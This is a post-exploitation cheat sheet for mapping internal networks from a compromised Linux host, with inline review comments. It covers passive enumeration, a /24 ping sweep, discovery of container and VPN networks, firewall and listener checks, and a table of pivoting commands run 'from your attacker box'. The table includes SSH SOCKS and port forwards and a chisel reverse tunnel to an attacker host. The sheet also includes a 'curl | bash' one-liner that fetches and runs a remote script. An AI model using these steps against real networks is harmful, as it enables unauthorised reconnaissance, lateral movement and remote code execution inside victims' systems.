Linux Internal Device scan
Phase 1 – Pure Passive (0 packets sent)
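# 1. Interfaces + IPs (cleanest view)
ip -br a
# 2. All reachable networks (this is where the real gold hides)
ip route show
# 3. Live hosts the box already talked to (reads the neighbour cache only;
#    FAILED/INCOMPLETE entries never answered, so they are dropped)
ip neigh show | grep -vE "FAILED|INCOMPLETE"
# raw procfs view of the same IPv4 ARP table
cat /proc/net/arp
# 4. Internal DNS + static hosts
cat /etc/resolv.conf
# read the file directly instead of cat|grep; "^#" strips comment lines only
grep -v "^#" /etc/hosts
# 5. Quick TL;DR of everything above (run this first 5 seconds)
#    uses the same FAILED|INCOMPLETE filter as step 3 so both views agree
clear; echo "IFACES"; ip -br a; echo "ROUTES"; ip route; echo "ARP CACHE"; ip neigh | grep -vE "FAILED|INCOMPLETE"; echo "DNS"; cat /etc/resolv.conf; echo "HOSTS"; cat /etc/hosts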
────────────────────────
Phase 2 – Low-Noise Active (still nearly invisible)
# Quiet ARP refresh of entire local subnet(s) – populates cache without nmap
# For every IPv4 route whose destination starts with a digit, send one ICMP
# echo (1 s reply timeout) to .1-.254 of that network, all 254 in the
# background at once; after a fixed 4 s wait, print the refreshed cache.
# NOTE(review): on the wire this is a complete /24 echo sweep per route in
# about a second, not a passive read – expect it in flow logs / IDS alerts.
for net in $(ip -4 route | awk '/^[0-9]/ {print $1}'); do
# NOTE(review): $ip is assigned here but never used below.
# $subnet = network address with the trailing ".octet" replaced by ".", so
# the generated addresses are only right for a /24; a /32 host route or a
# /16 yields addresses partly or wholly outside the route.
ip=${net%/*}; subnet=$(echo $net | cut -d'/' -f1 | sed 's/\.[0-9]*$/\./')
# Expansions are unquoted (SC2086); values come from ip/awk output, not user
# input, so word-splitting is harmless here.
for i in {1..254}; do (ping -c 1 -W 1 $subnet$i >/dev/null 2>&1 &); done
done; sleep 4; echo "Updated ARP cache:"; ip neigh
────────────────────────
Phase 3 – Hidden Network Discovery (Containers, VPNs, Tunnels)
# Docker / Podman / Containerd
# List the container networks, then keep the "subnet" lines (plus two lines
# of context) from inspecting every network id. Missing tools stay silent.
docker network ls 2>/dev/null
docker network inspect $(docker network ls -q) 2>/dev/null | grep -iA2 subnet
podman network ls 2>/dev/null
podman network inspect podman 2>/dev/null | grep -i subnet
# All tunnels & VPN interfaces
# Interface names that look like a tunnel, with the line after each match.
ip link show | grep -EA1 '(tun|tap|wg|tailscale|zerotier|zt|veth)'
wg show 2>/dev/null
tailscale status 2>/dev/null
# '| cat' stops systemctl from opening a pager.
systemctl status openvpn* wireguard* tailscaled zerotier-one 2>/dev/null | cat
# Bonus: Kubernetes / Calico / Flannel if present
# '|| true' turns "no CNI dir" or "no match" into a non-failure.
cat /etc/cni/net.d/* 2>/dev/null | grep -i subnet || true
────────────────────────
Phase 4 – Outbound Firewall & Pivot Feasibility
# What can this box actually reach?
# Only ACCEPT/DROP verdict lines are kept, so REJECT or RETURN rules will not
# show up; stderr is discarded so an absent tool stays quiet.
sudo iptables -L -n -v 2>/dev/null | grep -E 'ACCEPT|DROP'
sudo nft list ruleset 2>/dev/null | grep -E 'ip daddr|accept|drop'
# What services are listening?
# Same listener table twice, split on whether the local address is loopback.
printf '%s\n' "External listeners (pivot-in possible)"
ss -tulnpg | grep -v -e 127.0.0.1 -e ::1
printf '%s\n' "Local-only services (great for -L forwarding)"
ss -tulnpg | grep -e 127.0.0.1 -e ::1
────────────────────────
ONE-LINER TO RULE THEM ALL (run immediately on every box)
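# NOTE(review): this feeds a downloaded script straight into bash, unread and
# unverified, as the current user. `<>` is a URL placeholder – left as-is it
# parses as bash's read/write redirection, so fill it in before running.
curl -s <>.sh | bash
# OR copy-paste this monster if you can't curl:
# printf replaces 'echo -e' so the colour escapes do not depend on the echo
# flavour in use; the printed output is the same as the original one-liner.
clear
printf '\033[1;34m=== INTERFACES ===\033[0m\n'; ip -br a
printf '\n\033[1;34m=== ROUTES (PIVOT TARGETS) ===\033[0m\n'; ip route
printf '\n\033[1;34m=== LIVE HOSTS (ARP) ===\033[0m\n'; ip neigh | grep -v INCOMPLETE
printf '\n\033[1;34m=== DOCKER SUBNETS ===\033[0m\n'
# network ids arrive one per line; word-splitting is what makes them args
# shellcheck disable=SC2046
docker network inspect $(docker network ls -q) 2>/dev/null | grep -iA2 subnet || echo "none"
printf '\n\033[1;34m=== TUNNELS ===\033[0m\n'
ip link show | grep -EA1 '(tun|tap|wg|tailscale|zerotier)' || echo "none"
printf '\n\033[1;34m=== LISTENING PORTS ===\033[0m\n'; ss -tulnp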
────────────────────────
Instant Pivot Options Once You Pick a Target
| Goal | Command (from your attacker box) |
|---|---|
| SOCKS proxy (browse everything) | ssh -D 1080 user@compromised → proxychains nmap ... |
| One service forward | ssh -L 13306:10.10.5.55:3306 user@compromised |
| Full subnet tunnel | Ligolo-ng / Chisel / sshuttle |
| Fastest reverse tunnel | chisel server -p 9000 --reverse → chisel client attacker:9000 R:1080:socks |